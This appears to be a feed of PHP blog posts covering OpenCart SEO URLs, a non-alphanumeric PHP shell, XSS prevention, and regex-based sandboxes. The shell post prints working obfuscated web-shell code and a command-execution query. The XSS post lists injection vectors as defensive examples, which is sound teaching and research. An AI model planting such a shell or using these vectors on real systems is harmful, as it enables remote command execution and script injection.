Adding SEO-Friendly URLs to OpenCart
november 2011 by hanicker
First off, I must give credit where it is due. I got most of my information on OpenCart clean URLs from PHP Genious. In this post I will explain how friendly, or clean, URLs work in OpenCart.
Clean URLs are built into OpenCart 1.5. To use SEO URLs you need to enable them under your store’s server settings, rename the .htaccess.txt file, and add an SEO keyword for each product and category you create. The keywords will not be created for you. You must also have Apache mod_rewrite turned on; most web hosts have it on by default.
Enable SEO URLs in the OpenCart Admin
The first step is to enable SEO URLs in your store’s admin. Go to the “System” drop-down and click on “Settings”. Locate the store you want to alter and click the “Edit” link off to the right. Finally, click the “Server” tab, set the SEO URLs radio button to “Yes” and save your settings.
Rename the .htaccess.txt file
Next you must create an .htaccess file. If you do not create this file your pages will not display. OpenCart provides a file called .htaccess.txt. Rename this file to .htaccess and you will be good to go. If you don’t have this file in your root directory you will need to make your own .htaccess file. The file should include the following:
# 1. To use URL Alias you need to be running Apache with mod_rewrite enabled.
# 2. In your opencart directory rename htaccess.txt to .htaccess.
# For any support issues please visit: http://www.opencart.com
Options +FollowSymlinks
# Prevent Directory listing
Options -Indexes
# Prevent Direct Access to files
<FilesMatch "\.(tpl|ini|log)">
Order deny,allow
Deny from all
</FilesMatch>
# SEO URL Settings
RewriteEngine On
# If your OpenCart installation does not run in the main web folder, make sure you set the folder it does run in, i.e. / becomes /shop/
RewriteBase /
RewriteRule sitemap.xml /index.php?route=feed/google_sitemap
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^([^?]*) index.php?_route_=$1 [L,QSA]
### Additional Settings that may need to be enabled for some servers
### Uncomment the commands by removing the # sign in front of it.
### If you get an "Internal Server Error 500" after enabling any of the following settings, restore the # as this means your host doesn't allow that.
# 1. If your cart only allows you to add one item at a time, it is possible register_globals is on. This may work to disable it:
# php_flag register_globals off
# 2. If your cart has magic quotes enabled, This may work to disable it:
# php_flag magic_quotes_gpc Off
# 3. Set max upload file size. Most hosts will limit this and not allow it to be overridden but you can try
# php_value upload_max_filesize 999M
# 4. set max post size. uncomment this line if you have a lot of product options or are getting errors where forms are not saving all fields
# php_value post_max_size 999M
# 5. set max time script can take. uncomment this line if you have a lot of product options or are getting errors where forms are not saving all fields
# php_value max_execution_time 200
# 6. set max time for input to be received. Uncomment this line if you have a lot of product options or are getting errors where forms are not saving all fields
# php_value max_input_time 200
Enter SEO Keywords for URLs
Finally, you need to enter an SEO keyword for every information page, product and category whose URL you want rewritten. You will find the SEO Keyword field under the Data tab when creating or editing an item.
Once you have entered the SEO keywords, your URLs will be working. Now go and enjoy more traffic and happy customers.
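Because OpenCart will not create the keywords for you, it can help to derive them from the product or category name in a consistent way. The following is only a minimal sketch and not part of OpenCart: makeSeoKeyword() is a hypothetical helper name, and the rule it applies (lowercase a-z and 0-9 separated by single hyphens) is an assumption about what a clean keyword should look like.

```php
<?php
// Hypothetical helper (not part of OpenCart): turn a product or category
// name into a value you could paste into the SEO Keyword field.
function makeSeoKeyword($name) {
    $keyword = strtolower(trim($name));
    // Replace every run of characters other than a-z and 0-9 with one hyphen.
    $keyword = preg_replace('/[^a-z0-9]+/', '-', $keyword);
    // Drop any hyphen left over at either end.
    return trim($keyword, '-');
}

echo makeSeoKeyword('Canon EOS 5D (Body Only)'), "\n"; // canon-eos-5d-body-only
```

Names made up entirely of non-ASCII characters would come out empty with this rule, so treat it as a starting point rather than a finished slug generator.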
Articles
Marketing
Programming
clean_url
ecommerce
OpenCart
php
seo
uri
url
Non alphanumeric code in PHP
september 2011 by hanicker
So a small PHP shell was tweeted around and it inspired me to investigate a way to execute non-alphanumeric code. First I started with the idea of using octal escapes in PHP and constructing the escape piece by piece. For example, \107 is “G”, so if I could construct the “107” and add the backslash to the beginning, maybe I could construct “G”. It worked like this:
$_=+"";
$_=(++$_)+(++$_)+(++$_)+(++$_);
$__=+"";
$__++;
$___=$_*$_+$__+$__+$__+$__+$__+$__+$__;//107
$___="\\$___";
But there was no way to evaluate the escape once it was constructed without using alphanumeric characters, so I was stumped.
Then I had a brain wave: PHP automatically does a string conversion for arrays and converts them to “Array” when accessed as a string. That gave me “A”, “r”, “r” and so on, but I really needed “GET” in order to create a nice small non-alpha shell.
On to the second technique: PHP allows you to use bitwise operators on strings.
'a'|'b';//c!
We can make new characters by combining others, but I only had a limited set to work with. One simple for loop later, I had combined the characters to create “GET” and so made our small non-alphanumeric PHP shell:
<?
$_="";
$_[+""]='';
$_="$_"."";
$_=($_[+""]|" ").($_[+""]|" ").($_[+""]^" ");
?>
<?=${'_'.$_}['_'](${'_'.$_}['__']);?>
The first part converts a string into an array by attempting to assign to position “0” of the string. Then I make sure the array is converted to a string. Then I take the “A” from “Array” and use bitwise operators to construct “G”, “E” and “T”: “A”|0x06, “A”|0x05 and “A”^0x15. The three string literals in the listing hold the raw bytes 0x06, 0x05 and 0x15, which are non-printing control characters and so appear as blanks here. There you have it; you could even generate non-alpha code without using GET quite easily by producing different characters until you get an eval method.
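To make the character arithmetic easier to follow, here is a readable sketch of just the bitwise step. It deliberately uses ordinary alphanumeric code, with hex escapes standing in for the raw control bytes; the variable names are mine and not from the original shell.

```php
<?php
// PHP applies |, & and ^ to two strings byte by byte.
$word = 'Array';   // what PHP produces when an array is used as a string
$a = $word[0];     // "A", byte 0x41

$g = $a | "\x06";  // 0x41 | 0x06 = 0x47, "G"
$e = $a | "\x05";  // 0x41 | 0x05 = 0x45, "E"
$t = $a ^ "\x15";  // 0x41 ^ 0x15 = 0x54, "T"

$name = $g . $e . $t;
echo $name, "\n";  // GET
```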
To call the shell you’d use:
?_=shell_exec&__=whoami
Don’t forget: to analyze PHP code, use RIPS if you ever encounter this in the wild.
php
Security
Protecting against XSS
september 2011 by hanicker
The problem as I see it
Where to start? Let me start by telling you that most of the books you read are wrong. The code samples you copy off the internet to do a specific task are wrong (the wrong way to handle a GET request), and the function you copied from that work colleague, who in turn copied it from a forum, is wrong (the wrong way to handle redirects). Start to question everything. Maybe this blog post is wrong; this is the kind of mindset you require in order to protect your sites from XSS. You as a developer need to start thinking more about your code. If an article you are reading contains stuff like echo $_GET or Response.Write without filtering, then it’s time to close that article.
Are frameworks the answer? In my honest opinion, no. Yes, a framework might prevent XSS in the short term, but in the long term the framework code will be proven to contain mistakes as it evolves, and when it is exploited the impact will be more severe than if you wrote the code yourself. Why more severe? A framework hole can be easily automated since many sites share the same codebase. If you wrote your own filtering code, then an attacker would be able to exploit the individual site but would find it hard to automate an attack across a range of sites using different filtering methods. This is one of the main reasons the internet works today: not because everything is secure, just because everything is different.
One of the arguments I hear is that a developer can’t be trusted to create a perfect filtering system for a site and that using a framework ensures the developer follows best guidelines. I disagree. Developers are intelligent; they write code and understand code. If you can build a system you can protect it, because you’re in the best position to.
How to handle input
When you handle user input just think to yourself “a number is a vector”. Imagine a site that renders an image server side and allows you to choose the width and height of the graphic. If you don’t think a number is a vector then you might not put any restrictions on the width and height of the generated graphic, but what happens when an attacker requests a 100000×100000 graphic? If your code doesn’t handle the maximum and minimum inputs then an attacker can DoS your server with multiple requests. The lesson is not to be lazy about each input you handle; you need to make sure each value is validated correctly.
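As a rough illustration of treating a number as a vector, the sketch below accepts a width or height only when it is a whole number inside a fixed range. readDimension() is a hypothetical helper, and the limits (1 to 2000) and the fallback of 200 are assumptions chosen for the example, not values from any real site.

```php
<?php
// Hypothetical helper: accept a dimension only if it is a whole number
// inside the allowed range; otherwise fall back to a default.
function readDimension($value, $min, $max, $default) {
    $checked = filter_var($value, FILTER_VALIDATE_INT, array(
        'options' => array('min_range' => $min, 'max_range' => $max),
    ));
    // filter_var() returns false for non-integers, arrays and out-of-range values.
    return ($checked === false) ? $default : $checked;
}

$width  = readDimension('100000', 1, 2000, 200); // out of range, so 200
$height = readDimension('480', 1, 2000, 200);    // valid, so 480
```

Falling back to a default is one design choice; rejecting the request outright would be just as reasonable.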
The process should be as follows.
1. Validate type – Ensure the value you are getting is what you were expecting.
2. Whitelist – Remove any characters that should not be in the value by providing the only characters that should.
3. Validate Length – Always validate the length of the input even when the value isn’t being placed in the database. The less that an attacker has to work with the better.
4. Restrict – Refine what’s allowed within the range of characters you allow. For example is the minimum value 5?
5. Escape – Depending on context (where your variable is on the page) escape correctly.
You can make things easier for yourself by placing these methods into a function or a class, but don’t overcomplicate: keep each method as simple as possible, and be very careful and descriptive with your function names to avoid confusion.
HTML context
Let’s look at an example of the method above with a code sample in PHP.
<?php
$x = (string) $_GET['x']; //ensure we get a string not array
$x = preg_replace("/[^\w]/","", $x); //remove any characters that are not a-z, A-Z, 0-9 or _
$x = substr($x, 0, 10);//restrict to a maximum of 10 characters
if(!preg_match("/^a/i", $x)) {//this value must begin with a or A
    $x = '';
}
echo '<b>' . htmlentities($x, ENT_QUOTES) . '</b>'; //escape everything according to context of $x
?>
You might be wondering why I used (string) in the code above. Let’s try it without it.
Using the following: test.php?x[]=123
Results in: “Warning: substr() expects parameter 1 to be string, array given”
Because PHP allows you to pass arrays over a GET request, an attacker can trigger a PHP warning about an unexpected type when you try to whitelist the value. Casting to the type you expect ensures you get that type.
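An alternative to casting is to refuse anything that is not already a string. The sketch below shows one way to do that; getStringParam() is a hypothetical helper name, and returning an empty string for bad input is an assumption you may want to change.

```php
<?php
// Hypothetical helper: return the parameter only when it is a real string.
function getStringParam(array $source, $key) {
    if (!isset($source[$key]) || !is_string($source[$key])) {
        return ''; // missing, or an array such as x[]=123
    }
    return $source[$key];
}

// Typical use would be: $x = getStringParam($_GET, 'x');
```

The whitelist, length, restrict and escape steps still apply to whatever this returns.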
Great, so we now understand how to restrict and escape a value. Let’s look at another context.
Script context
When not in XHTML/XML mode a script tag does not decode HTML entities. If you have a value within a variable inside a script tag, the question is: what do you escape?
example:
<script>x='value here';</script>
Inside a JavaScript variable like this you have to watch out for ' and </script>; using these vectors it’s possible to XSS the value. The two examples are listed below.
vector 1: ',alert(1),//
vector 2: </script><img src=1 onerror=alert(1)>
The second example requires no quotes, and a lot of developers assume it won’t be executed because it’s still inside a JavaScript variable. This is clearly wrong: it executes because the HTML parser ends the script block at the first </script> it sees, regardless of the JavaScript string around it.
To escape a value inside a script context you should JavaScript escape the value. The best way of doing this is using Unicode escapes. A Unicode escape in JavaScript looks like the following:
<script>
alert('\u0061');//"a" in a unicode escape
</script>
You can experiment with Unicode escapes using my Hackvertor tool. Please understand how they work, as they will be very important to you when understanding how to protect many contexts.
It’s very important you follow the same procedure as before (Validate type, Whitelist, Validate Length, Restrict, Escape) for the specific variable you’re working on, but this time we will convert our value into Unicode escapes. A simple function to do that is as follows:
<?php
function jsEscape($input) {
    $output = '';
    $input = preg_replace("/[^\\x01-\\x7F]/", "", (string) $input);//remove any characters outside the range 0x01-0x7f
    if(strlen($input) == 0) {//checked after filtering so str_split() never sees an empty string
        return '';
    }
    $chars = str_split($input);
    for($i=0;$i<count($chars);$i++) {
        $char = $chars[$i];
        $output .= sprintf("\\u%04x", ord($char));//get the character code, convert it to hex and prefix with \u00
    }
    return $output;
}
?>
I’ve purposely designed this function with a few little optimisations missing. For example, instead of using Unicode escapes you could use hex escapes, since we restrict the range of allowed characters; alphanumeric characters are converted even though they could be left as their literal characters; and new lines and tabs are encoded too when you could use the shorter equivalent. Let’s add a line to use the shorter \t escape for a tab instead of \u0009. Why would you want to do this? To reduce the characters sent down the wire.
Code to handle tab:
<?php
if(preg_match("/^\t$/", $char)) {
    $output .= '\\t';
    continue;
}
?>
This converts a tab specifically to “\t”. Notice how we separate input and output: by using continue we can skip the generic handling of the input character and override it with something more specific. The full code is below for clarity.
<?php
function jsEscape($input) {
    $output = '';
    $input = preg_replace("/[^\\x01-\\x7F]/", "", (string) $input);
    if(strlen($input) == 0) {//checked after filtering so str_split() never sees an empty string
        return '';
    }
    $chars = str_split($input);
    for($i=0;$i<count($chars);$i++) {
        $char = $chars[$i];
        if(preg_match("/^\t$/", $char)) {
            $output .= '\\t';//don't unicode escape, use the shorter \t instead. Double escape, remember!
            continue;//skip the generic escape and move on to the next char
        }
        $output .= sprintf("\\u%04x", ord($char));
    }
    return $output;
}
?>
Exercises for this code:
1. Can you handle characters outside the ASCII range?
2. Convert any non-dangerous character to its escaped or literal representation.
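One possible take on the second exercise is sketched below, assuming that only a-z, A-Z and 0-9 count as non-dangerous. jsEscapeCompact() is a hypothetical name for this variant, and the function is an illustration rather than a vetted escaper.

```php
<?php
// Sketch for exercise 2: letters and digits pass through unchanged,
// every other ASCII character becomes a \uXXXX escape.
function jsEscapeCompact($input) {
    $output = '';
    // Same restriction as jsEscape: drop anything outside 0x01-0x7f.
    $input = preg_replace('/[^\x01-\x7F]/', '', (string) $input);
    $length = strlen($input);
    for ($i = 0; $i < $length; $i++) {
        $char = $input[$i];
        if (preg_match('/^[a-zA-Z0-9]$/', $char)) {
            $output .= $char; // alphanumerics cannot break out of a string
        } else {
            $output .= sprintf('\\u%04x', ord($char));
        }
    }
    return $output;
}

echo jsEscapeCompact("it's </script>"), "\n";
```

Quotes, angle brackets, slashes, ampersands and backslashes are all still escaped, so the output stays safe in the contexts discussed here while being shorter than escaping every character.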
Script context in XHTML
In the previous section you might have wondered about XHTML when I stated “when not in XHTML/XML mode a script tag does not decode HTML entities”. In XHTML, entities can be decoded even inside script blocks! Fortunately the code I provided for that section will handle that, since Unicode escapes are used. If you followed the exercises in that section, did you make the “&” safe? That is something to think about when you are working on an XHTML page. In order for XHTML to be used in the browser you have to serve the pages with the correct XHTML header. I recommend you don’t use the XHTML header.
Even though the previous examples still protect you against attack, I will show you a couple of vectors for XHTML sites:
<script>x='&#39;,alert(/This works in XHTML/)//';</script>
<script>x='&#x27;,alert(/This also works in XHTML/)//';</script>
This would work in any XML-based format: entities can be used to break out of strings, and just a simple </ will also do the trick. Don’t use XHTML, or if you do, Unicode escape and don’t allow a literal “&”.
JavaScript events
Now you know what happens in XHTML, you might be interested to know it also happens in HTML attributes. Any HTML attribute, including events such as onclick, will automatically decode entities and use them as if they were literal characters. This is best demonstrated with a code example.
<div title="&gt;" id="x">test</div>
<script>
alert(document.getElementById('x').title);
</script>
As you can see, instead of the title attribute of the div element returning “&gt;” it returned “>”, because the entity was automatically decoded. This whole process is one of the root causes of XSS when the developer doesn’t understand it. Let’s look at what happens with an onclick event and a variable “x”.
<a href="#" onclick="x='&#39;,alert(1),&#39;';">test</a>
Clicking on the link fires the alert because, as in XHTML, the entities are decoded. When you are in the attribute context you need to do exactly the same as if you were in the XHTML context. Reusing your jsEscape function will fully protect you from XSS in attributes and variables like this.
innerHTML context
I hope you’ve grasped the previous concepts because now it’s going to get slightly confusing. If you[…]
articles
php
Security
xss
Is there more work with PHP?
june 2011 by hanicker
I'm picking up this post from edit and quoting a paragraph from it:
PHP skills are consistently the most sought after for the projects posted by clients; Graphic Design comes second (Web design is 6th), while language skills for translation take the bronze medal, ahead of, in order, WordPress (a blog engine that is itself written in PHP) and the evergreen HTML.
What do you think?
CC BY-NC-SA 2006 - 2011 · Is there more work with PHP?
PHP
Facebook HipHop and performance
april 2011 by hanicker
PHP is an interpreted language, not a compiled one. The difference? No need for me to explain it, you know it perfectly well, right?
Joking aside, the people at Facebook came up with HipHop (and released it under an open source license). What does HipHop do? It does what you usually aren't supposed to do: it takes an interpreted language like PHP, converts it to C++ (a compiled language) and, well, compiles it.
Why? For performance reasons... To simplify: a compiled language is considerably faster than an interpreted one. There is one fewer "step" in executing the code (the interpreter), so time is saved. How much time? According to Facebook the improvement is substantial: 1.7x.
What does that mean? It means Facebook saves 50% of the CPU on its servers (a percentage that has grown over time, and which it can use for other things) and that (in theory), without spending money on new hardware, it has improved the overall performance of its site by almost double.
Impressive, don't you think?
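The two figures quoted above (1.7x and 50% of CPU) measure the same thing in different ways, and a little arithmetic shows how they relate. This is only a sketch, assuming the workload stays the same and CPU time per request is inversely proportional to the speedup; the function names are made up for the illustration.

```javascript
// Fraction of CPU time saved when the same work runs `speedup` times faster.
function cpuSavedFraction(speedup) {
  return 1 - 1 / speedup;
}

// Speedup needed to save a given fraction of CPU time on the same work.
function speedupFromSaving(savedFraction) {
  return 1 / (1 - savedFraction);
}

console.log(cpuSavedFraction(1.7).toFixed(2)); // "0.41": 1.7x saves about 41% of CPU
console.log(speedupFromSaving(0.5));           // 2: saving 50% of CPU means 2x
```

Under that assumption, 1.7x corresponds to roughly 41% less CPU, while the 50% figure corresponds to a full 2x, which fits the remark that the percentage grew over time.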
CC BY-NC-SA 2006 - 2011 · Facebook HipHop and performance
PHP
facebook
hiphop
from google
2011 Vector Calendar PDF
december 2010 by hanicker
Following up on an old post, here is the 2011 vector calendar in PDF format.
You can find it at this link. You can open the 2011 calendar PDF in Illustrator or Photoshop and then do whatever you like with it.
Need the 2012 calendar? Just change the parameter at the end of the link.
P.S.
For the more "daring", the source is still here.
Grafica
PHP
calendario_2011_pdf
calendario_pdf
calendario_vettoriale
from google
Regular expression sandboxing
may 2010 by hanicker
Birth of the regex sandbox
I decided today to do a proper blog post to explain my reasons for creating regex sandboxes. I don’t often write a lot of words on this blog, partly because I’m not very good at making long meaningful sentences and partly because I think the point can often be made in fewer words. Hopefully this will be useful for someone writing filters.
First off, a quote: “You can’t parse [X]HTML with regex. Because HTML can’t be parsed by regex. Regex is not a tool that can be used to correctly parse HTML” (from stackoverflow). I agree with the comment: it isn’t possible to fully parse HTML with regexes, but my goal wasn’t to do that. I wanted to parse a safe form of HTML. I also have an uncontrollable urge to do something that people say can’t be done.
Now we have that out of the way, how did this all begin? Well, I was building a char-by-char JavaScript parser inside JavaScript to allow untrusted code to be executed. Every time I wrote a simple string matching function I found myself taking shortcuts and using regexes instead. For example, why loop through all the characters when you can whitelist the desired ones? I soon found that using regexes instead of parsing every character gave me a great advantage, because I could use the native JavaScript engine to help me.
This led me to develop JSReg [1]. At first it seemed very easy to match JavaScript; numbers and strings were pretty easy, but I then encountered one of the first problems of regex sandboxes. It is very difficult to match something that can contain itself. For example, an array can contain pretty much any JavaScript statement, including another array, so how can you match it while you are still defining it? I didn’t really have an answer to this. One of my solutions was to create a recursive regex that created a second compiler to match inside the first match and so on. But this was slow, and because JavaScript doesn’t have lookbehind, previous matches would eat characters in the next match (I’ll talk more about this in the design). My other idea was to use backreferences, but these are very difficult to track when using multiple regexes and they only return a successful match; in my tests it wasn’t possible to produce a perfect array match using backreferences. I could be wrong of course, I know I’m not perfect.
The design
The basis of my design was to not rely on 3rd party code where possible, which means no jQuery etc. In addition, I should employ multiple layers of security wherever possible. These were good design decisions: throughout initial testing the multiple layers proved difficult to break down. For JSReg the first layer was an iframe. The iframe was created on each execution, giving fresh prototypes and a throwaway box once execution had finished. Then I whitelisted all JavaScript objects/properties; this was done by forcing all methods to use a suffix/prefix of “$”. Each variable assignment was then localized using var to force local variables. Each object was also checked to ensure it didn’t contain a window reference.
JavaScript arrays proved tricky, as mentioned earlier, because of the amount of code that can be included within them. Initially I decided to try and match them and their contents, but there were several performance problems with matching all that code, plus JavaScript regex limitations. For example, I use one regex with a replace function to globally match each sequence using groups; the idea is to match all the valid objects first. In the instance of an array you’d first match all regex objects, strings etc., because they can contain a “[” and “]”. Then, once all valid objects have been enumerated by the regex engine, it will encounter the first “[” of our array.
This works well in practice for every object apart from arrays. In JavaScript the array literal shares the same syntax as the object accessor. Therefore you have to tell the difference between an array and an object accessor. Sounds easy?
[][0[0,0[0]]];
+[][0[0,0[0]]];
{}['I am an array']
~{a:0}['I am a object accessor']
As you can see with the samples above, you’d have to match the entire JS syntax before the opening “[”. Then, if you don’t match the entire sequence inside the array, you won’t know if the ending “]” is part of an array or an object accessor. This problem was unsolved for a long time. The main reason was that, in order to protect against window references, I rewrite object accessors like obj['abc'] to obj[JSREG_FUNC.gp('abc')], so the function returns a safe string which uses the prefix/suffix of $, e.g. abc becomes $abc$. Because the expression now returns a string, it would break an array if the array wasn’t detected.
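The property-name rewrite can be pictured with a tiny stand-in for JSREG_FUNC.gp. This is a sketch under the assumption that gp does nothing more than wrap the name in “$”; the real function is not shown here and may do more, and sandboxObject is a made-up example.

```javascript
// Hypothetical stand-in for JSREG_FUNC.gp: wrap a property name in "$".
function gp(name) {
  return '$' + String(name) + '$';
}

// Made-up object exposed to sandboxed code: only "$"-wrapped names exist on it.
const sandboxObject = { $abc$: 42 };

console.log(sandboxObject[gp('abc')]);         // reads sandboxObject.$abc$
console.log(sandboxObject[gp('constructor')]); // "$constructor$" is not defined, so undefined
```

Because every computed name passes through the wrapper, a string such as 'constructor' or 'window' can never reach the real property of that name.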
Detecting an array or object accessor was difficult because of the design too. You see, if a regex object like /abc/ is matched and is followed by an object accessor, as in /abc/['source'], the previous expression is eaten by the parser, so the next match is effectively ['source'], which JSReg understandably thinks is an array. A simple way round this would be a lookbehind to see whether the characters before the opening “[” (checked against a whitelist) make it an array or not. But JavaScript doesn’t support lookbehinds!
The simple workaround was to use Array(1,2,3) for arrays instead and assume no “[” or “]” belonged to an array literal. This worked, but it breaks existing code. Finally, after many attempts, I think I’ve come up with a solution. I store a list of previous matches and rewrite all array literals and object accessors into a function or method call. This means I no longer need to detect the ending of the array, as both end with a “)” instead of a “]”. Easily demonstrated with a code example:-
[1,2,3] //becomes:-
A(Number(1),Number(2),Number(3))
window['x']//becomes:-
$window$.JSREG_PROP('x')
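A rough sketch of that idea: one global regex walks the code, strings are matched first so brackets inside them are skipped, and the previous token decides whether a “[” opens an array literal or an accessor. The names A and JSREG_PROP come from the example above; rewriteBrackets and its token rules are assumptions made for this illustration, not JSReg's code. It ignores keywords such as return, regex literals and comments, and it neither wraps numbers in Number() nor renames window to $window$.

```javascript
// Hypothetical sketch: turn "[" ... "]" into call syntax based on the previous token.
function rewriteBrackets(code) {
  // Groups: 1 = string literal, 2 = identifier or number, 3 = "[", 4 = "]", 5 = any other char.
  const token = /("(?:[^"\\]|\\.)*"|'(?:[^'\\]|\\.)*')|([A-Za-z_$][\w$]*|\d+)|(\[)|(\])|([\s\S])/g;
  let previousEndsValue = false; // true when the last token could be the target of an accessor

  return code.replace(token, function (match, str, word, open, close, other) {
    if (open !== undefined) {
      // After a value, "[" is an accessor; anywhere else it starts an array literal.
      const out = previousEndsValue ? '.JSREG_PROP(' : 'A(';
      previousEndsValue = false;
      return out;
    }
    if (close !== undefined) {
      previousEndsValue = true;
      return ')'; // both rewrites end the same way, so the closer needs no detection
    }
    if (str !== undefined || word !== undefined) {
      previousEndsValue = true;
      return match;
    }
    if (/\s/.test(other)) {
      return other; // whitespace does not change what came before
    }
    previousEndsValue = other === ')';
    return other;
  });
}

console.log(rewriteBrackets("[1,2,3]"));     // A(1,2,3)
console.log(rewriteBrackets("window['x']")); // window.JSREG_PROP('x')
```

Keeping a single flag for the previous token plays the role that a lookbehind would have played.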
Finally, as part of the design, I check the JavaScript syntax before and after conversion. This provides another layer of security if the rewrite fails at any point while matching the code.
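One way to picture a before-and-after syntax check is to hand the source to the Function constructor, which parses the code without running it. This is a sketch of the general technique, not necessarily how JSReg does it; hasValidSyntax and convertChecked are hypothetical names. Note that the Function constructor parses its argument as a function body, so a top-level return is accepted, and it is unavailable on pages whose Content Security Policy forbids eval-like calls.

```javascript
// Returns true when `source` parses as a function body. The function is never called.
function hasValidSyntax(source) {
  try {
    new Function(source);
    return true;
  } catch (e) {
    if (e instanceof SyntaxError) return false;
    throw e; // anything else (e.g. a CSP EvalError) is not a syntax verdict
  }
}

// Run a rewrite step only between two syntax checks.
function convertChecked(source, rewrite) {
  if (!hasValidSyntax(source)) throw new SyntaxError('input does not parse');
  const rewritten = rewrite(source);
  if (!hasValidSyntax(rewritten)) throw new SyntaxError('rewritten code does not parse');
  return rewritten;
}

console.log(hasValidSyntax('var a = [1,2,3];')); // true
console.log(hasValidSyntax('var a = [1,2'));     // false
```

If a rewrite rule eats a character it should not have, the second check refuses the output instead of letting half-converted code through.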
The code
JavaScript is difficult to match, but I found HTML/CSS easier. At first I started the code for HTMLReg [2] and CSSReg [3] in a similar way to JSReg. Then, while hacking my own code, I realized how I could make it defend better against attack. First off I employed a strict whitelist to remove any attacks using partially open HTML and evil attributes that were obvious attacks. This means I didn’t stick to the HTML specification: I don’t allow any junk in attributes. For example, if you want to include “<” or “>” inside a title attribute then you have to encode it. I may allow them in future if it can be proven safe, but I’d rather not fight something I can’t win. You may disagree with what I’ve just said, but your filter is probably being pwnd right now.
Once I had my whitelist of tags and attributes I constructed regexes for the individual parts I wanted to match, for example text nodes, invalid tags and valid attributes. These would be nicely chained together in one big regex. Then each part is grouped so that you can match each expression and validate it.
Here is how it works:-
html.replace(mainRegExp, function($0, $styleTag, $tag, $text, $invalidTags) {});
Notice how I use the replace function: I don’t do html = html.replace because I only want to match the text in my regexes. I prefer to use replace because I automatically get a nice reference to each group as a local variable. This was a lesson I learned from developing JSReg, as if the replace fails to match, it returns your plain code rather than rewriting it.
Inside the function I include a couple of things in each block. I’ll use the text node as an example:-
if($text !== undefined && $text.length) {
  output += $text;
  parseTree+='text('+$text+')\n';
}
Here if the text node is matched it adds it to the output. Parse tree is a nice way of keeping track of what you’ve matched. It’s a useful debugging reference. The if statement is required because of browser inconsistencies when matching groups.
In the case of HTMLReg for performance reasons I have a whitelist to match a general tag, then inspect it further so I’m only matching a smaller amount of text. You can see that with the following code:-
if($tag !== undefined && $tag.length) {
  if(!new RegExp('^<\\\/?'+allowedTags.source+'[\\s>]','i').test($tag)) {
    return '';
  }
  parseTree+='tag('+$tag+')\n';
  if(!/^<\/?[a-z0-9]+>$/i.test($tag)) {
    $tag = parseAttrValues($tag);
  }
  output += $tag;
}
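The fragments above can be assembled into a small runnable sketch. Everything specific here is an assumption for illustration: the whitelist in allowedTags, the shape of mainRegExp (without the style-tag group) and the filterHtml wrapper are made up, and instead of parseAttrValues, which is not shown, the sketch simply drops every attribute.

```javascript
// Hypothetical whitelist; the real HTMLReg list is not shown in the post.
const allowedTags = /(?:b|i|em|strong|p)/;
// Groups: 1 = something shaped like a tag, 2 = a text node, 3 = a stray "<" or ">".
const mainRegExp = /(<\/?[a-z][a-z0-9]*(?:\s[^<>]*)?>)|([^<>]+)|([<>])/gi;

function filterHtml(html) {
  let output = '';
  let parseTree = '';
  // The return value of replace is ignored; replace is only used to walk the matches.
  html.replace(mainRegExp, function ($0, $tag, $text, $invalid) {
    if ($tag !== undefined && $tag.length) {
      if (!new RegExp('^<\\/?' + allowedTags.source + '[\\s>]', 'i').test($tag)) {
        return ''; // not whitelisted: contributes nothing to the output
      }
      parseTree += 'tag(' + $tag + ')\n';
      // Simplification: strip all attributes rather than validating their values.
      output += $tag.replace(/^(<\/?[a-z0-9]+)[\s\S]*$/i, '$1>');
    } else if ($text !== undefined && $text.length) {
      parseTree += 'text(' + $text + ')\n';
      output += $text;
    }
    // A stray "<" or ">" ($invalid) is silently dropped.
    return '';
  });
  return { output: output, parseTree: parseTree };
}

const result = filterHtml('<b onclick="x()">hi</b><script>alert(1)</script>');
console.log(result.output); // <b>hi</b>alert(1)
```

The script tags vanish because they fail the whitelist test, while their contents survive only as an inert text node.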
Once my tag has been matched I then start to parse attributes. I do this by creating a hidden div and reading its contents. This is cool for a number of reasons: we can read what the browser reads, and our code automatically gets formatted. Because we then use the DOM, our entities will be decoded for us. While testing I found that JavaScript won’t be executed using innerHTML without certain tags or attributes, so if I whitelist the tags and attributes I can use innerHTML safely without having to worry about execution. I have a backup plan if this fails: I could be more strict with certain attributes if it turns out to be possible to execute code.
Onto CSSReg! It didn’t exist, nor did I think it was needed, as I thought I could rely on the browser to ensure multiple CSS rules didn’t cross over from single CSS DOM rules. I was wrong. It was proven by many talented researchers (mentioned in the thanks section) that it wasn’t possible to get the browsers to rewrite CSS safely. I had to write another regex sandbox. This time it wasn’t as tricky as it first appeared. As long as I didn’t try to follow the madness of the specification again, I should be able to produce CSS that was safe from malicious code yet useful enough to use.
First off I gathered a list of properties and identifiers. I removed crappy browser-specific extensions; yeah, they are bad. ALL OF THEM. Then I used the same method as HTMLReg to match each part. The trickiest part this time was URLs. There are so many ways to escape a CSS URL in every browser, you h[…]
CSSReg
HTMLReg
JSReg
Security
javascript
php
xss
from google
AneCMS
march 2010 by hanicker
I've been sent this tip and I'm glad to publish it...
AneCMS is a new Italian-Swiss project... The author tells me:
For now I have concentrated on developing the core, which still has a few problems, but I have started developing some test modules, for example a blog, a forum and a gallery; they are very simple for now.
I have also been accepted on opensourcecms. I need a lot of help: translators, programmers and web designers, but also people with ideas.
If you want to lend the project a hand, step forward!
Mi_segnalano
PHP
anecms
cms
from google
Flex for PHP developers
march 2010 by hanicker
A quick little post to point you to ideogroup's fine translation of the article Flex for PHP developers.
While I'm at it, I'll say hi to my mom, since I haven't seen her in a while.
AIR_e_Flex
PHP
Programmazione
flex
from google
PHP runtime rewritten, by Facebook?
february 2010 by hanicker
Yes, it's true. Facebook has completely rewritten the PHP runtime to make it faster and more efficient, and it's completely open source. Named HipHop, it's described as a source code transformer, changing PHP into optimized C++ which is then compiled using g++, thus keeping the best aspects of PHP while taking advantage of the performance of C++. Using HipHop, Facebook's web server CPU usage has been decreased by about fifty percent! And who would have thought that this, and many other cool advances in programming, started at a Hackathon?
misc_hacks
c++
efficient
facebook
g++
hack
hackathon
php
speed
from google